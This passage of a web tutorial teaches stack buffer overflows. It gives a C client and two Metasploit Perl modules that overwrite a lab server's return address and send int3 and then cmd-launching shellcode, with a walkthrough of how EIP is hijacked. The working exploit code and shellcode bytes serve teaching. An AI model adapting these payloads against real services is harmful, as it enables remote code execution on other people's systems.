strcpy(aa,"AAAAAAAAAAAA");
aa[12] = 0x8c;
aa[13] = 0xff;
aa[14] = 0x12;
aa[15] = 0x00;
aa[16] = 0x00;
aa[17] = 0x00;
aa[18] = 0x00;
aa[19] = 0x00;
aa[20] = 0xcc;
send(s, aa , strlen(aa)+9,0);
}
In the client program we connect to the server running on port 2000 IP address 70.0.0.10. We then send 12 A’ to the server. The first 8 will snugly fit into the array buf, the next 4 will overwrite ebp and the next four will have0x0012ff8c. We must learn to read backwards. Then we will have four 0’s and then a CC which happens to the op code for int 3. If we see the stack at this time, under windows the stack begins at the same place each time the program is run. We have compiled our code with Visual C++ 6.0 and not Visual Studio .net. The newer compilers add code to detect and thwart buffer overflow. The key point is that each time we run our program, the value 0x0012ff8c will be moved into eip at the end of our function. Eip will now execute code beginning at this location at the end of our function main. Here starts the code that we have send from the net. Thus when we run the client on 70.0.0.2, on our server machine we get the breakpoint message box. Lets now see how the Metasploit framework make sit easy to write a buffer overflow.
Z1.pm
package Msf::Exploit::z1;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$s = Msf::Socket::Tcp->new('PeerAddr' => '70.0.0.10', 'PeerPort' => 2000);
$req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" . "\xcc" ;
$s->Send($req);
}
We first run the server on 70.0.0.10 and then run the exploit z1 as use z1, exploit on 70.0.0.2. What we see is the now familiar breakpoint. The info array need not be there. In the exploit function we create a new Tcp object with 70.0.0.10 as the Ip address and 2000 as the port number. We will later like good guys use variables to set these values. We then create a string req with the 12 A’s, the stack location, 4 zeroes and the CC opcode. We then use the Send function to send our string over. See how simple it is to write an exploit using the framework.
Z2.pm
package Msf::Exploit::z2;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$s = Msf::Socket::Tcp->new('PeerAddr' => '70.0.0.10', 'PeerPort' => 2000);
$req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" ;
$req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04";
$req .= "\x50\xb8\x92\x74\x59\x7c\xff\xd0\x6a\x00\xb8\x72\x69\x59\x7c\xff\xd0";
$s->Send($req);
}
When we once again run the server as server on 70.0.0.10 and use z2, exploit on the client 70.0.0.2 we see a dos box open up on the server. This as of now makes no sense as the dos box should open up on the client and not the server. The point is that instead of running a CC or the breakpoint interrupt we are running code that opens up a dos box. If the code does not work on your machine, you have not read our tutorial and need to change two address in the above code. This code is difficult to write and understand and that is why we call it shell code.
For some reason when we use his payloads like win32_bind etc nothing works. We asked this question on the mailing lists and we got no answer. Hence we stop here and hope you like the manner we have simplified the Metasploit framework.
WebRepOverall rating
